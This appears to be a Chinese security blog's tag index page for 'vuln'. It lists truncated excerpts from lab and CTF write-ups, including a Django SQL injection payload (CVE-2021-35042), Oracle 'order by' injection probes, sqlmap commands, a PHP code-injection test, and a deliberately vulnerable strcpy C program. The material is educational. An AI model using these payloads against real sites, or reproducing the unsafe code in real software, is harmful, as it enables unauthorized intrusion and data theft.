首页 > TAG信息列表 > vuln
Vulfocus靶场 | Django SQL注入(CVE-2021-35042)
漏洞复现 这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\ 直接按照提示,进入了Django报错页面 flag就在里面,直接ctrl+F就能找到 爆数据库版本 order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%[2022.05.23]使用idea快速搭建S2-045漏洞环境
1.使用idea打开https://github.com/xhycccc/Struts2-Vuln-Demo/tree/master/s2-045 2.配置如下: 然后启动即可基于Python-Django的多功能Web安全渗透测试工具设计
项目介绍 系统简介 本项目命名为 Sec-Tools,是一款基于 Python-Django 的多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。 项目功能 本系统通过 旁站探测 和 域名探测 功能对待检测网站进行资产收集,通过基于Oracle网站的SQL注入
基于Oracle网站的SQL注入 参考链接1 参考链接2 使用 order by 语句查询列数 www.vuln-web.com/photo.php?id=1' order by 1-- Working www.vuln-web.com/photo.php?id=1' order by 10-- www.vuln-web.com/photo.php?id=1' order by 7-- Working www.vuln-web.com/photo.php?id红日靶场学习记录(一)
2021-11-15 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 进入后点击会弹出下载连接,是百度云盘的,没有会员的话要耐心下载一会了。Spring Boot Actuator H2 RCE复现
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 springboot docker vuln环境搭建 4.2 漏洞发现Vuln-Range之php命令注入
1.开启靶场 简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。 通过传入name参数的值就可以来进行代码注入了。 2.随便试一个值 http://192.168.0.20:32769/?name=phpinfo() 果然没有那么简单,被过滤了。 3.查看源码 我不太懂php的代码,查阅了一下,可sqlmap使用
初步使用 判断是否有注入点 -u "http://www.target.com/vuln.php?id=1" ,若存在注入点,则会显示web容器的一些信息 获取数据库 -u "http://www.target.com/vuln.php?id=1" --dbs 查看当前应用程序所用的数据库 -u "http://www.target.com/vuln.php?id=1" --current-db 列出指定mangodb用法
# 改变标表中的某一字段类型 db.pts_vuln.find({"vuln_type":{$type:"double"}}).forEach(function(x){x.vuln_level=NumberInt(x.vuln_level);db.pts_vuln.save(x)}) # 改变标表中的某一字段名称 db.getCollection('pts_annex').update({}, {$rename : {"creati渗透测试之弱点扫描
发现漏洞、 1、基于端口服务扫描结果版本信息(速度较慢) 2、搜索已公开的漏洞数据库(数量大) www.exploit-db.com------可查询已公开的漏洞 /usr/share/exploitdb/---------kali自带的漏洞模块存储路径searchsploit --------------搜索相应的漏洞模块 example:searchsploit wondows 7 /OSCP Learning Notes - Scanning
TCP vs UDP TCP: Connection-oriented Suited for applications that require high reliablity[HTTP, FTP,Telnet] Three-way handshake UDP: Connectionless Suited for applications that need fast connection[DNS, DHCP, SNMP] No handshake Scanning with Nmap ExampLinux (x86) Exploit 开发系列教程之一(典型的基于堆栈的缓冲区溢出)
(1)漏洞代码 //vuln.c#include <stdio.h>#include <string.h>int main(int argc, char* argv[]) { /* [1] */ char buf[256]; /* [2] */ strcpy(buf,argv[1]); /* [3] */ printf("Input:%s\n",buf); return 0;} 编译 sudo s